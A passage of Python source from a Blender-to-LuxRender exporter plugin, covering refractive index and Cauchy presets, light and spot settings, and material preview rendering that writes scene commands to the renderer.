"1Z *** LIQUIDS @ 20 C ***", "11 - Benzene", "12 - Water", "13 - Ethyl alcohol", "14 - Carbon tetrachloride", "15 - Carbon disulfide",
"2Z *** SOLIDS at room temperature ***", "21 - Diamond", "22 - Strontium titanate", "23 - Amber", "24 - Fused silica glass", "25 - sodium chloride",
"3Z *** OTHER Materials ***", "31 - Pyrex (Borosilicate glass)", "32 - Ruby", "33 - Water ice", "34 - Cryolite", "35 - Acetone", "36 - Ethanol", "37 - Teflon", "38 - Glycerol", "39 - Acrylic glass", "40 - Rock salt", "41 - Crown glass (pure)", "42 - Salt (NaCl)", "43 - Polycarbonate", "44 - PMMA", "45 - PETg", "46 - PET", "47 - Flint glass (pure)", "48 - Crown glass (impure)", "49 - Fused Quartz", "50 - Bromine", "51 - Flint glass (impure)", "52 - Cubic zirconia", "53 - Moissanite", "54 - Cinnabar (Mercury sulfide)", "55 - Gallium(III) prosphide", "56 - Gallium(III) arsenide", "57 - Silicon"]
iorvals = [1.0, 1.0, 1.0002926, 1.000293, 1.000036, 1.000132, 1.00045,
1.501, 1.501, 1.333, 1.361, 1.461, 1.628,
2.419, 2.419, 2.41, 1.55, 1.458, 1.50,
1.470, 1.470, 1.760, 1.31, 1.388, 1.36, 1.36, 1.35, 1.4729, 1.490, 1.516, 1.50, 1.544, 1.584, 1.4893, 1.57, 1.575, 1.60, 1.485, 1.46, 1.661, 1.523, 2.15, 2.419, 2.65, 3.02, 3.5, 3.927, 4.01]
global icon_float
if gui: gui.newline(caption, 4, level, icon_float, scalelist([0.5,0.5,0.6],2.0/(level+2)))
str = ""
keyname = "%s:%s"%(key, name)
texname = "%s:%s"%(mat.getName(), keyname)
value = luxProp(mat, keyname, default)
iorusepreset = luxProp(mat, keyname+".iorusepreset", "true")
luxBool("iorusepreset", iorusepreset, "Preset", "Select from a list of predefined presets", gui, 0.4)
if(iorusepreset.get() == "true"):
iorpreset = luxProp(mat, keyname+".iorpreset", "24 - Fused silica glass")
if gui:
def setIor(i, value, preset, tree, dict): # callback function to set ior value after selection
if i >= 0:
value.set(dict[i])
preset.set(getTreeNameById(tree, i))
iortree = [ ("Liquids", [("Acetone", 1), ("Alcohol, Ethyl (grain)", 2), ("Alcohol, Methyl (wood)", 3), ("Beer", 4), ("Benzene", 5), ("Carbon tetrachloride", 6), ("Carbon disulfide", 7), ("Carbonated Beverages", 8), ("Chlorine (liq)", 9), ("Cranberry Juice (25%)", 10), ("Glycerin", 11), ("Honey, 13% water content", 12), ("Honey, 17% water content", 13), ("Honey, 21% water content", 14), ("Ice", 15), ("Milk", 16), ("Oil, Clove", 17), ("Oil, Lemon", 18), ("Oil, Neroli", 19), ("Oil, Orange", 20), ("Oil, Safflower", 21), ("Oil, vegetable (50 C)", 22), ("Oil of Wintergreen", 23), ("Rum, White", 24), ("Shampoo", 25), ("Sugar Solution 30%", 26), ("Sugar Solution 80%", 27), ("Turpentine", 28), ("Vodka", 29), ("Water (0 C)", 30), ("Water (100 C)", 31), ("Water (20 C)", 32), ("Whisky", 33) ] ), ("Gases", [("Vacuum", 101), ("Air @ STP", 102), ("Air", 103), ("Helium", 104), ("Hydrogen", 105), ("Carbon dioxide", 106) ]), ("Transparent\x20", [("Eye, Aqueous humor", 201), ("Eye, Cornea", 202), ("Eye, Lens", 203), ("Eye, Vitreous humor", 204), ("Glass, Arsenic Trisulfide", 205), ("Glass, Crown (common)", 206), ("Glass, Flint, 29% lead", 207), ("Glass, Flint, 55% lead", 208), ("Glass, Flint, 71% lead", 209), ("Glass, Fused Silica", 210), ("Glass, Pyrex", 211), ("Lucite", 212), ("Nylon", 213), ("Obsidian", 214), ("Plastic", 215), ("Plexiglas", 216), ("Salt", 217) ]), ("Gemstones", [("Agate", 301), ("Alexandrite", 302), ("Almandine", 303), ("Amber", 304), ("Amethyst", 305), ("Ammolite", 306), ("Andalusite", 307), ("Apatite", 308), ("Aquamarine", 309), ("Axenite", 310), ("Beryl", 311), ("Beryl, Red", 312), ("Chalcedony", 313), ("Chrome Tourmaline", 314), ("Citrine", 315), ("Clinohumite", 316), ("Coral", 317), ("Crystal", 318), ("Crysoberyl, Catseye", 319), ("Danburite", 320), ("Diamond", 321), ("Emerald", 322), ("Emerald Catseye", 323), ("Flourite", 324), ("Garnet, Grossular", 325), ("Garnet, Andradite", 326), ("Garnet, Demantiod", 327), ("Garnet, Mandarin", 328), ("Garnet, Pyrope", 329), ("Garnet, Rhodolite", 330), ("Garnet, Tsavorite", 331), ("Garnet, Uvarovite", 332), ("Hauyn", 333), ("Iolite", 334), ("Jade, Jadeite", 335), ("Jade, Nephrite", 336), ("Jet", 337), ("Kunzite", 338), ("Labradorite", 339), ("Lapis Lazuli", 340), ("Moonstone", 341), ("Morganite", 342), ("Obsidian", 343), ("Opal, Black", 344), ("Opal, Fire", 345), ("Opal, White", 346), ("Oregon Sunstone", 347), ("Padparadja", 348), ("Pearl", 349), ("Peridot", 350), ("Quartz", 351), ("Ruby", 352), ("Sapphire", 353), ("Sapphire, Star", 354), ("Spessarite", 355), ("Spinel", 356), ("Spinel, Blue", 357), ("Spinel, Red", 358), ("Star Ruby", 359), ("Tanzanite", 360), ("Topaz", 361), ("Topaz, Imperial", 362), ("Tourmaline", 363), ("Tourmaline, Blue", 364), ("Tourmaline, Catseye", 365), ("Tourmaline, Green", 366), ("Tourmaline, Paraiba", 367), ("Tourmaline, Red", 368), ("Zircon", 369), ("Zirconia, Cubic", 370) ] ), ("Other ", [("Pyrex (Borosilicate glass)", 401), ("Ruby", 402), ("Water ice", 403), ("Cryolite", 404), ("Acetone", 405), ("Ethanol", 406), ("Teflon", 407), ("Glycerol", 408), ("Acrylic glass", 409), ("Rock salt", 410), ("Crown glass (pure)", 411), ("Salt (NaCl)", 412), ("Polycarbonate", 413), ("PMMA", 414), ("PETg", 415), ("PET", 416), ("Flint glass (pure)", 417), ("Crown glass (impure)", 418), ("Fused Quartz", 419), ("Bromine", 420), ("Flint glass (impure)", 421), ("Cubic zirconia", 422), ("Moissanite", 423), ("Cinnabar (Mercury sulfide)", 424), ("Gallium(III) prosphide", 425), ("Gallium(III) arsenide", 426), ("Silicon", 427) ] ) ]
iordict = {1:1.36, 2:1.36, 3:1.329, 4:1.345, 5:1.501, 6:1.000132, 7:1.00045, 8:1.34, 9:1.385, 10:1.351, 11:1.473, 12:1.504, 13:1.494, 14:1.484, 15:1.309, 16:1.35, 17:1.535, 18:1.481, 19:1.482, 20:1.473, 21:1.466, 22:1.47, 23:1.536, 24:1.361, 25:1.362, 26:1.38, 27:1.49, 28:1.472, 29:1.363, 30:1.33346, 31:1.31766, 32:1.33283, 33:1.356, 101:1.0, 102:1.0002926, 103:1.000293, 104:1.000036, 105:1.000132, 106:1.00045, 201:1.33, 202:1.38, 203:1.41, 204:1.34, 205:2.04, 206:1.52, 207:1.569, 208:1.669, 209:1.805, 210:1.459, 211:1.474, 212:1.495, 213:1.53, 214:1.50, 215:1.460, 216:1.488, 217:1.516, 301:1.544, 302:1.746, 303:1.75, 304:1.539, 305:1.532, 306:1.52, 307:1.629, 308:1.632, 309:1.567, 310:1.674, 311:1.57, 312:1.570, 313:1.544, 314:1.61, 315:1.532, 316:1.625, 317:1.486, 318:2.000, 319:1.746, 320:1.627, 321:2.417, 322:1.560, 323:1.560, 324:1.434, 325:1.72, 326:1.88, 327:1.880, 328:1.790, 329:1.73, 330:1.740, 331:1.739, 332:1.74, 333:1.490, 334:1.522, 335:1.64, 336:1.600, 337:1.660, 338:1.660, 339:1.560, 340:1.50, 341:1.518, 342:1.585, 343:1.50, 344:1.440, 345:1.430, 346:1.440, 347:1.560, 348:1.760, 349:1.53, 350:1.635, 351:1.544, 352:1.757, 353:1.757, 354:1.760, 355:1.79, 356:1.712, 357:1.712, 358:1.708, 359:1.76, 360:1.690, 361:1.607, 362:1.605, 363:1.603, 364:1.61, 365:1.61, 366:1.61, 367:1.61, 368:1.61, 369:1.777, 370:2.173, 401:1.47, 402:1.76, 403:1.31, 404:1.388, 405:1.36, 406:1.36, 407:1.35, 408:1.4729, 409:1.49, 410:1.516, 411:1.5, 412:1.544, 413:1.584, 414:1.4893, 415:1.57, 416:1.575, 417:1.6, 418:1.485, 419:1.46, 420:1.661, 421:1.523, 422:2.15, 423:2.419, 424:2.65, 425:3.02, 426:3.5, 427:3.927}
r = gui.getRect(1.6, 1)
Draw.Button(iorpreset.get(), evtLuxGui, r[0], r[1], r[2], r[3], "select IOR preset", lambda e,v: setIor(Draw.PupTreeMenu(iortree), value, iorpreset, iortree, iordict))
link = luxFloat(name, value, min, max, "IOR", hint, None, 1.6)
else:
link = luxFloat(name, value, min, max, "IOR", hint, gui, 1.6, 1)
tex = luxProp(mat, keyname+".textured", False)
if gui: Draw.Toggle("T", evtLuxGui, gui.x, gui.y-gui.h, gui.h, gui.h, tex.get()=="true", "use texture", lambda e,v:tex.set(["false","true"][bool(v)]))
if tex.get()=="true":
if gui: gui.newline("", -2)
(str, link) = luxTexture(name, key, "float", default, min, max, caption, hint, mat, gui, level+1)
if value.get() != 1.0:
str += "Texture \"%s\" \"float\" \"scale\" \"texture tex1\" [\"%s\"] \"float tex2\" [%s]\n"%(texname+".scale", texname, value.get())
link = " \"texture %s\" [\"%s\"]"%(name, texname+".scale")
return (str, link)
def luxCauchyBFloatTexture(name, key, default, min, max, caption, hint, mat, gui, level=0):
# IOR preset data
cauchybnames = ["01 - Fused silica glass", "02 - Borosilicate glass BK7", "03 - Hard crown glass K5", "04 - Barium crown glass BaK4", "05 - Barium flint glass BaF10", "06 - Dense flint glass SF10" ]
cauchybvals = [ 0.00354, 0.00420, 0.00459, 0.00531, 0.00743, 0.01342 ]
global icon_float
if gui: gui.newline(caption, 4, level, icon_float, scalelist([0.5,0.5,0.6],2.0/(level+2)))
str = ""
keyname = "%s:%s"%(key, name)
texname = "%s:%s"%(mat.getName(), keyname)
value = luxProp(mat, keyname, default)
cauchybusepreset = luxProp(mat, keyname+".cauchybusepreset", "true")
luxBool("cauchybusepreset", cauchybusepreset, "Preset", "Select from a list of predefined presets", gui, 0.4)
if(cauchybusepreset.get() == "true"):
cauchybpreset = luxProp(mat, keyname+".cauchybpreset", "01 - Fused silica glass")
luxOption("cauchybpreset", cauchybpreset, cauchybnames, " PRESET", "select CauchyB preset", gui, 1.6)
idx = cauchybnames.index(cauchybpreset.get())
value.set(cauchybvals[idx])
link = luxFloat(name, value, min, max, "cauchyb", hint, None, 1.6)
else:
link = luxFloat(name, value, min, max, "cauchyb", hint, gui, 1.6, 1)
tex = luxProp(mat, keyname+".textured", False)
if gui: Draw.Toggle("T", evtLuxGui, gui.x, gui.y-gui.h, gui.h, gui.h, tex.get()=="true", "use texture", lambda e,v:tex.set(["false","true"][bool(v)]))
if tex.get()=="true":
if gui: gui.newline("", -2)
(str, link) = luxTexture(name, key, "float", default, min, max, caption, hint, mat, gui, level+1)
if value.get() != 1.0:
str += "Texture \"%s\" \"float\" \"scale\" \"texture tex1\" [\"%s\"] \"float tex2\" [%s]\n"%(texname+".scale", texname, value.get())
link = " \"texture %s\" [\"%s\"]"%(name, texname+".scale")
return (str, link)
def luxLight(name, kn, mat, gui, level):
if gui:
if name != "": gui.newline(name+":", 10, level)
else: gui.newline("color:", 0, level+1)
(str,link) = luxLightSpectrumTexture("L", kn+"light", "1.0 1.0 1.0", 1.0, "Spectrum", "", mat, gui, level+1)
if gui: gui.newline("")
link += luxFloat("power", luxProp(mat, kn+"light.power", 100.0), 0.0, 10000.0, "Power(W)", "AreaLight Power in Watts", gui)
# link += luxFloat("efficacy", luxProp(mat, kn+"light.efficacy", 17.0), 0.0, 100.0, "Efficacy(lm/W)", "Efficacy Luminous flux/watt", gui)
if gui: gui.newline("")
link += luxFloat("scale", luxProp(mat, kn+"light.scale", 1.0), 0.0, 100.0, "scale", "Gain/scale multiplier", gui)
# lightgroup = luxProp(mat, kn+"light.lightgroup", "default")
# luxString("lightgroup", lightgroup, "group", "assign light to a named light-group", gui, 1.0)
if gui: gui.newline("Photometric")
pm = luxProp(mat, kn+"light.usepm", "false")
luxCollapse("photometric", pm, "Photometric Diagram", "Enable Photometric Diagram options", gui, 2.0)
if(pm.get()=="true"):
pmtype = luxProp(mat, kn+"light.pmtype", "imagemap")
pmtypes = ["imagemap"]
luxOption("type", pmtype, pmtypes, "type", "Choose Photometric data type to use", gui, 0.6)
if(pmtype.get() == "imagemap"):
map = luxProp(mat, kn+"light.pmmapname", "")
link += luxFile("mapname", map, "map-file", "filename of the photometric map", gui, 1.4)
# if(pmtype.get() == "IESna"):
# map = luxProp(mat, kn+"light.pmiesname", "")
# link += luxFile("iesname", map, "ies-file", "filename of the IES photometric data file", gui, 1.4)
has_bump_options = 0
has_object_options = 1
return (str, link)
def luxLamp(name, kn, mat, gui, level):
if gui:
if name != "": gui.newline(name+":", 10, level)
else: gui.newline("color:", 0, level+1)
# if gui: gui.newline("", 10, level)
(str,link) = luxLightSpectrumTexture("L", kn+"light", "1.0 1.0 1.0", 1.0, "Spectrum", "", mat, gui, level+1)
if gui: gui.newline("")
link += luxFloat("scale", luxProp(mat, kn+"light.scale", 1.0), 0.0, 100.0, "scale", "Gain/scale multiplier", gui)
# lightgroup = luxProp(mat, kn+"light.lightgroup", "default")
# luxString("lightgroup", lightgroup, "group", "assign light to a named light-group", gui, 1.0)
if gui: gui.newline("Photometric")
pm = luxProp(mat, kn+"light.usepm", "false")
luxBool("photometric", pm, "Photometric Diagram", "Enable Photometric Diagram options", gui, 2.0)
if(pm.get()=="true"):
map = luxProp(mat, kn+"light.pmmapname", "")
link += luxFile("mapname", map, "map-file", "filename of the photometric map", gui, 1.4)
# if(pmtype.get() == "IESna"):
# map = luxProp(mat, kn+"light.pmiesname", "")
# link += luxFile("iesname", map, "ies-file", "filename of the IES photometric data file", gui, 1.4)
# link += luxBool("flipz", luxProp(mat, kn+"light.flipZ", "true"), "Flip Z", "Flip Z direction in mapping", gui, 2.0)
return (str, link)
def luxSpot(name, kn, mat, gui, level):
if gui:
if name != "": gui.newline(name+":", 10, level)
else: gui.newline("color:", 0, level+1)
# if gui: gui.newline("", 10, level)
(str,link) = luxLightSpectrumTexture("L", kn+"light", "1.0 1.0 1.0", 1.0, "Spectrum", "", mat, gui, level+1)
if gui: gui.newline("")
link += luxFloat("scale", luxProp(mat, kn+"light.scale", 1.0), 0.0, 100.0, "scale", "Gain/scale multiplier", gui)
# lightgroup = luxProp(mat, kn+"light.lightgroup", "default")
# luxString("lightgroup", lightgroup, "group", "assign light to a named light-group", gui, 1.0)
if gui: gui.newline("Projection")
proj = luxProp(mat, kn+"light.usetexproj", "false")
luxBool("projection", proj, "Texture Projection", "Enable imagemap texture projection", gui, 2.0)
if(proj.get() == "true"):
map = luxProp(mat, kn+"light.pmmapname", "")
link += luxFile("mapname", map, "map-file", "filename of the photometric map", gui, 2.0)
return (str, link)
def Preview_Sphereset(mat, kn, state):
if state=="true":
luxProp(mat, kn+"prev_sphere", "true").set("true")
luxProp(mat, kn+"prev_plane", "false").set("false")
luxProp(mat, kn+"prev_torus", "false").set("false")
def Preview_Planeset(mat, kn, state):
if state=="true":
luxProp(mat, kn+"prev_sphere", "true").set("false")
luxProp(mat, kn+"prev_plane", "false").set("true")
luxProp(mat, kn+"prev_torus", "false").set("false")
def Preview_Torusset(mat, kn, state):
if state=="true":
luxProp(mat, kn+"prev_sphere", "true").set("false")
luxProp(mat, kn+"prev_plane", "false").set("false")
luxProp(mat, kn+"prev_torus", "false").set("true")
def Preview_Update(mat, kn, defLarge, defType, texName, name, level):
#print("%s %s %s %s %s %s %s" % (mat, kn, defLarge, defType, texName, name, level))
global previewing
previewing = True
Blender.Window.WaitCursor(True)
scn = Scene.GetCurrent()
# set path mode to absolute for preview
pm_prop = luxProp(scn, "pathmode", "absolute")
pm = pm_prop.get()
pm_prop.set('absolute')
# Size of preview thumbnail
thumbres = 110 # default 110x110
if(defLarge):
large = luxProp(mat, kn+"prev_large", "true")
else:
large = luxProp(mat, kn+"prev_large", "false")
if(large.get() == "true"):
thumbres = 140 # small 140x140
thumbbuf = thumbres*thumbres*3
# consolebin = luxProp(scn, "luxconsole", "").get()
p = get_lux_pipe(scn, buf=thumbbuf, type="luxconsole")
# Unremark to write debugging output to file
# p.stdin = open('c:\preview.lxs', 'w')
if defType == 0:
prev_sphere = luxProp(mat, kn+"prev_sphere", "true")
prev_plane = luxProp(mat, kn+"prev_plane", "false")
prev_torus = luxProp(mat, kn+"prev_torus", "false")
elif defType == 1:
prev_sphere = luxProp(mat, kn+"prev_sphere", "false")
prev_plane = luxProp(mat, kn+"prev_plane", "true")
prev_torus = luxProp(mat, kn+"prev_torus", "false")
else:
prev_sphere = luxProp(mat, kn+"prev_sphere", "false")
prev_plane = luxProp(mat, kn+"prev_plane", "false")
prev_torus = luxProp(mat, kn+"prev_torus", "true")
# Zoom
if luxProp(mat, kn+"prev_zoom", "false").get() == "true":
p.stdin.write('LookAt 0.250000 -1.500000 0.750000 0.250000 -0.500000 0.750000 0.000000 0.000000 1.000000\nCamera "perspective" "float fov" [22.5]\n')
else:
p.stdin.write('LookAt 0.0 -3.0 0.5 0.0 -2.0 0.5 0.0 0.0 1.0\nCamera "perspective" "float fov" [22.5]\n')
# Fleximage
p.stdin.write('Film "image" "integer xresolution" [%i] "integer yresolution" [%i] "string filename" ["luxblend-preview"] \n'%(thumbres, thumbres))
p.stdin.write('PixelFilter "sinc"\n')
# Quality
scn = Scene.GetCurrent()
defprevmat = luxProp(scn, "defprevmat", "high")
quality = luxProp(mat, kn+"prev_quality", defprevmat.get())
if quality.get()=="low":
p.stdin.write('Sampler "lowdiscrepancy" "integer pixelsamples" [2]\n')
elif quality.get()=="medium":
p.stdin.write('Sampler "lowdiscrepancy" "integer pixelsamples" [4]\n')
elif quality.get()=="high":
p.stdin.write('Sampler "lowdiscrepancy" "integer pixelsamples" [8]\n')
else:
p.stdin.write('Sampler "lowdiscrepancy" "integer pixelsamples" [32]\n')
# SurfaceIntegrator
if(prev_plane.get()=="false"):
p.stdin.write('SurfaceIntegrator "path" "integer directsamples" [1] "integer diffusereflectdepth" [1] "integer diffusereflectsamples" [4] "integer diffuserefractdepth" [4] "integer diffuserefractsamples" [1] "integer glossyreflectdepth" [1] "integer glossyreflectsamples" [2] "integer glossyrefractdepth" [4] "integer glossyrefractsamples" [1] "integer specularreflectdepth" [2] "integer specularrefractdepth" [4]\n')
else:
p.stdin.write('SurfaceIntegrator "path" "integer directsamples" [1] "integer diffusereflectdepth" [0] "integer diffusereflectsamples" [0] "integer diffuserefractdepth" [0] "integer diffuserefractsamples" [0] "integer glossyreflectdepth" [0] "integer glossyreflectsamples" [0] "integer glossyrefractdepth" [0] "integer glossyrefractsamples" [0] "integer specularreflectdepth" [1] "integer specularrefractdepth" [1]\n')
# World
p.stdin.write('WorldBegin\n')
if(prev_sphere.get()=="true"):
p.stdin.write('AttributeBegin\nTransform [0.5 0.0 0.0 0.0 0.0 0.5 0.0 0.0 0.0 0.0 0.5 0.0 0.0 0.0 0.5 1.0]\n')
elif (prev_plane.get()=="true"):
p.stdin.write('AttributeBegin\nTransform [0.649999976158 0.0 0.0 0.0 0.0 4.90736340453e-008 0.649999976158 0.0 0.0 -0.649999976158 4.90736340453e-008 0.0 0.0 0.0 0.5 1.0]\n')
else:
p.stdin.write('AttributeBegin\nTransform [0.35 -0.35 0.0 0.0 0.25 0.25 0.35 0.0 -0.25 -0.25 0.35 0.0 0.0 0.0 0.5 1.0]\n')
obwidth = luxProp(mat, kn+"prev_obwidth", 1.0)
obw = obwidth.get()
p.stdin.write('TransformBegin\n')
p.stdin.write('Scale %f %f %f\n'%(obw,obw,obw))
if texName:
print("texture "+texName+" "+name)
(str, link) = luxTexture(texName, name, "color", "1.0 1.0 1.0", None, None, "", "", mat, None, 0, level)
link = link.replace(" "+texName+"\"", " Kd\"") # swap texture name to "Kd"
p.stdin.write(str+"\n")
p.stdin.write("Material \"matte\" "+link+"\n")
else:
# Material
p.stdin.write(luxMaterial(mat))
link = luxProp(mat,"link","").get()
if kn!="": link = link.rstrip("\"")+":"+kn.strip(".:")+"\""
p.stdin.write(link+'\n')
p.stdin.write('TransformEnd\n')
# Shape
if(prev_sphere.get()=="true"):
p.stdin.write('Shape "sphere" "float radius" [1.0]\n')
elif (prev_plane.get()=="true"):
p.stdin.write(' Shape "trianglemesh" "integer indices" [ 0 1 2 0 2 3 ] "point P" [ 1.0 1.0 0.0 -1.0 1.0 0.0 -1.0 -1.0 -0.0 1.0 -1.0 -0.0 ] "float uv" [ 1.0 1.0 0.0 1.0 0.0 0.0 1.0 0.0 ]\n')
elif (prev_torus.get()=="true"):
p.stdin.write('Shape "torus" "float radius" [1.0]\n')
p.stdin.write('AttributeEnd\n')
# Checkerboard floor
if(prev_plane.get()=="false"):
p.stdin.write('AttributeBegin\nTransform [5.0 0.0 0.0 0.0 0.0 5.0 0.0 0.0 0.0 0.0 5.0 0.0 0.0 0.0 0.0 1.0]\n')
p.stdin.write('Texture "checks" "color" "checkerboard"')
p.stdin.write('"integer dimension" [2] "string aamode" ["supersample"] "color tex1" [0.9 0.9 0.9] "color tex2" [0.0 0.0 0.0]')
p.stdin.write('"string mapping" ["uv"] "float uscale" [36.8] "float vscale" [36.0]\n')
p.stdin.write('Material "matte" "texture Kd" ["checks"]\n')
p.stdin.write('Shape "loopsubdiv" "integer nlevels" [3] ')
p.stdin.write('"integer indices" [ 0 1 2 0 2 3 1 0 4 1 4 5 5 4 6 5 6 7 ]')
p.stdin.write('"point P" [ 1.000000 1.000000 0.000000 -1.000000 1.000000 0.000000 -1.000000 -1.000000 0.000000 1.000000 -1.000000 0.000000 1.000000 3.000000 0.000000 -1.000000 3.000000 0.000000 1.000000 3.000000 2.000000 -1.000000 3.000000 2.000000')
p.stdin.write('] "normal N" [ 0.000000 0.000000 1.000000 0.000000 0.000000 1.000000 0.000000 0.000000 1.000000 0.000000 0.000000 1.000000 0.000000 -0.707083 0.707083 0.000000 -0.707083 0.707083 0.000000 -1.000000 0.000000 0.000000 -1.000000 0.000000')
p.stdin.write('] "float uv" [ 0.333334 0.000000 0.333334 0.333334 0.000000 0.333334 0.000000 0.000000 0.666667 0.000000 0.666667 0.333333 1.000000 0.000000 1.000000 0.333333 ]\n')
p.stdin.write('AttributeEnd\n')
# Lightsource
if(prev_plane.get()=="false"):
p.stdin.write('AttributeBegin\nTransform [1.0 0.0 0.0 0.0 0.0 1.0 0.0 0.0 0.0 0.0 1.0 0.0 1.0 -1.0 4.0 1.0]\n')
else:
p.stdin.write('AttributeBegin\nTransform [1.0 0.0 0.0 0.0 0.0 1.0 0.0 0.0 0.0 0.0 1.0 0.0 1.0 -4.0 1.0 1.0]\n')
area = luxProp(mat, kn+"prev_arealight", "false")
if(area.get() == "false"):
p.stdin.write('LightSource "point" "blackbody L" [6500] "float gain" [0.002]')
else:
p.stdin.write('ReverseOrientation\n')
p.stdin.write('AreaLightSource "area" "color L" [1.0 1.0 1.0]\n')
if(prev_plane.get()=="false"):
p.stdin.write(' "float gain" [0.3]\n')
p.stdin.write('Shape "disk" "float radius" [1.0]\nAttributeEnd\n')
p.stdin.write('WorldEnd\n')
previewing = False
data = p.communicate()[0]
p.stdin.close()
# restore path mode
pm_prop.set(pm)
datalen = len(data)
if(datalen < thumbbuf):
print("error on preview: got %i bytes, expected %i" % (datalen, thumbbuf))
return
global previewCache
image = luxImage()
image.decodeLuxConsole(thumbres, thumbres, data)
previewCache[(mat.name+":"+kn).__hash__()] = image
Draw.Redraw()
Blender.Window.WaitCursor(False)
def luxPreview(mat, name, defType=0, defEnabled=False, defLarge=False, texName=None, gui=None, level=0, color=None):
if gui:
kn = name
if texName: kn += ":"+texName
if kn != "": kn += "."
if(defEnabled == True):
showpreview = luxProp(mat, kn+"prev_show", "true")
else:
showpreview = luxProp(mat, kn+"prev_show", "false")
Draw.Toggle("P", evtLuxGui, gui.xmax, gui.y-gui.h, gui.h, gui.h, showpreview.get()=="true", "Preview", lambda e,v: showpreview.set(["false","true"][bool(v)]))
if showpreview.get()=="true":
if(defLarge):
large = luxProp(mat, kn+"prev_large", "true")
else:
large = luxProp(mat, kn+"prev_large", "false")
voffset = -8
rr = 5.65
if(large.get() == "true"):
rr = 7
voffset = 22
gui.newline()
r = gui.getRect(1.1, rr)
if(color != None):
BGL.glColor3f(color[0],color[1],color[2]); BGL.glRectf(r[0]-110, r[1], 418, r[1]+128+voffset); BGL.glColor3f(0.9, 0.9, 0.9)
try: previewCache[(mat.name+":"+kn).__hash__()].draw(r[0]-82, r[1]+4)
except: pass
prev_sphere = luxProp(mat, kn+"prev_sphere", "true")
prev_plane = luxProp(mat, kn+"prev_plane", "false")
prev_torus = luxProp(mat, kn+"prev_torus", "false")
if defType == 1:
prev_sphere = luxProp(mat, kn+"prev_sphere", "false")
prev_plane = luxProp(mat, kn+"prev_plane", "true")
prev_torus = luxProp(mat, kn+"prev_torus", "false")
elif defType == 2:
prev_sphere = luxProp(mat, kn+"prev_sphere", "false")
prev_plane = luxProp(mat, kn+"prev_plane", "false")
prev_torus = luxProp(mat, kn+"prev_torus", "true")
# preview mode toggle buttons
Draw.Toggle("S", evtLuxGui, r[0]-108, r[1]+100+voffset, 22, 22, prev_sphere.get()=="true", "Draw Sphere", lambda e,v: Preview_Sphereset(mat, kn, ["false","true"][bool(v)]))
Draw.Toggle("P", evtLuxGui, r[0]-108, r[1]+74+voffset, 22, 22, prev_plane.get()=="true", "Draw 2D Plane", lambda e,v: Preview_Planeset(mat, kn, ["false","true"][bool(v)]))
Draw.Toggle("T", evtLuxGui, r[0]-108, r[1]+48+voffset, 22, 22, prev_torus.get()=="true", "Draw Torus", lambda e,v: Preview_Torusset(mat, kn, ["false","true"][bool(v)]))
# Zoom toggle
zoom = luxProp(mat, kn+"prev_zoom", "false")
Draw.Toggle("Zoom", evtLuxGui, r[0]+66, r[1]+100+voffset, 50, 18, zoom.get()=="true", "Zoom", lambda e,v: zoom.set(["false","true"][bool(v)]))
area = luxProp(mat, kn+"prev_arealight", "false")
Draw.Toggle("Area", evtLuxGui, r[0]+66, r[1]+5, 50, 18, area.get()=="true", "Area", lambda e,v: area.set(["false","true"][bool(v)]))
# Object width
obwidth = luxProp(mat, kn+"prev_obwidth", 1.0)
Draw.Number("Width:", evtLuxGui, r[0]+66, r[1]+78+voffset, 129, 18, obwidth.get(), 0.001, 10, "The width of the preview object in blender/lux 1m units", lambda e,v: obwidth.set(v))
# large/small size
Draw.Toggle("large", evtLuxGui, r[0]+200, r[1]+78+voffset, 88, 18, large.get()=="true", "Large", lambda e,v: large.set(["false","true"][bool(v)]))
# Preview Quality
qs = ["low","medium","high","very high"]
scn = Scene.GetCurrent()
defprevmat = luxProp(scn, "defprevmat", "high")
quality = luxProp(mat, kn+"prev_quality", defprevmat.get())
luxOptionRect("quality", quality, qs, " Quality", "select preview quality", gui, r[0]+200, r[1]+100+voffset, 88, 18)
# Update preview
Draw.Button("Update Preview", evtLuxGui, r[0]+120, r[1]+5, 167, 18, "Update Material Preview", lambda e,v: Preview_Update(mat, kn, defLarge, defType, texName, name, level))
# Reset depths after getRect()
gui.y -= 92+voffset
gui.y -= gui.h
gui.hmax = 18 + 4
def luxMaterialBlock(name, luxname, key, mat, gui=None, level=0, str_opt=""):
global icon_mat, icon_matmix, icon_map3dparam
def c(t1, t2):
return (t1[0]+t2[0], t1[1]+t2[1])
str = ""
if key == "": keyname = kn = name
else: keyname = kn = "%s:%s"%(key, name)
if kn != "": kn += "."
if keyname == "": matname = mat.getName()
else: matname = "%s:%s"%(mat.getName(), keyname)
if mat:
mattype = luxProp(mat, kn+"type", "matte")
# Set backwards compatibility of glossy material from plastic and substrate
if(mattype.get() == "substrate" or mattype.get() == "glossy" or mattype.get() == "plastic"):
mattype.set("uber")
# this is reverse order than in shown in the dropdown list
# FIXME translucent
materials = ["uber",
#"translucent", "measured", "substrate", "plastic"
"subsurface", "mixmat", "mirror", "metal", "matte", "kdsubsurface", "glass"]
if level == 0: materials = ["light","boundvolume"]+materials
if gui:
icon = icon_mat
if mattype.get() == "mix": icon = icon_matmix
if level == 0: gui.newline("Material type:", 12, level, icon, [0.75,0.5,0.25])
else: gui.newline(name+":", 12, level, icon, scalelist([0.75,0.6,0.25],2.0/(level+2)))
link = luxOption("type", mattype, materials, " TYPE", "select material type", gui)
showadvanced = luxProp(mat, kn+"showadvanced", "false")
luxBool("advanced", showadvanced, "Advanced", "Show advanced options", gui, 0.6)
showhelp = luxProp(mat, kn+"showhelp", "false")
luxHelp("help", showhelp, "Help", "Show Help Information", gui, 0.4)
# show copy/paste menu button
if gui: Draw.PushButton(">", evtLuxGui, gui.xmax+gui.h, gui.y-gui.h, gui.h, gui.h, "Menu", lambda e,v: showMatTexMenu(mat,keyname,False))
# Draw Material preview option
showmatprev = False
if level == 0:
showmatprev = True
if gui: luxPreview(mat, keyname, 0, showmatprev, True, None, gui, level, [0.746, 0.625, 0.5])
if gui: gui.newline()
has_object_options = 0 # disable object options by default
has_bump_options = 0 # disable bump mapping options by default
has_emission_options = 0 # disable emission options by default
has_compositing_options = 0 # disable compositing options by default
if mattype.get() == "mixmat":
(str,link) = c((str,link), luxFloatTexture("amount", keyname, 0.5, 0.0, 1.0, "amount", "The degree of mix between the two materials", mat, gui, level+1))
(str,link) = c((str,link), luxMaterialBlock("mat1", "namedmaterial1", keyname, mat, gui, level+1))
(str,link) = c((str,link), luxMaterialBlock("mat2", "namedmaterial2", keyname, mat, gui, level+1))
has_bump_options = 0
has_object_options = 1
has_emission_options = 1
has_compositing_options = 0
if mattype.get() == "boundvolume":
link = ""
voltype = luxProp(mat, kn+"vol.type", "homogeneous")
